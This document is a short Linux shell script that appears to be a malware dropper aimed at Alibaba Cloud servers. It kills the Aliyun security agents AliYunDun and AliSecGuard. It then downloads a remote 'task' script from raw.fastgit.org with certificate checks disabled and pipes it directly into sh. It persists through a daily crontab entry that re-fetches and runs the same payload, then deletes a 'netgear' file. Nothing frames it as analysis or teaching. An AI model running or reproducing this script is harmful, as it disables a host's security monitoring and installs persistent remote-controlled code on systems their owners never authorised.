#!/bin/sh
killall AliYunDun > /dev/null 2>&1
killall AliSecGuard > /dev/null 2>&1
killall AliYunDunUpdate > /dev/null 2>&1
zero=0
process=`ps aux | grep tcpp | grep -v grep | wc -l`
if [ "$process" -eq "$zero" ]; then
	wget  --no-check-certificate -O - -q https://raw.fastgit.org/tcppl/0/main/task | sh > /dev/null 2>&1
	crontab -l > /tmp/tmpcrontcpp
	crone=`grep 'tcppl' /tmp/tmpcrontcpp | wc -l`
	if [ "$crone" -eq "$zero" ]; then
		echo "01 02 * * * wget  --no-check-certificate -O - -q https://raw.fastgit.org/tcppl/0/main/task | sh > /dev/null 2>&1" >> /tmp/tmpcrontcpp
		crontab -u `whoami` /tmp/tmpcrontcpp
	else
		echo "crontab runing"
	fi
	rm -rf /tmp/tmpcrontcpp
else
	echo "process runing"
fi
rm -rf netgear
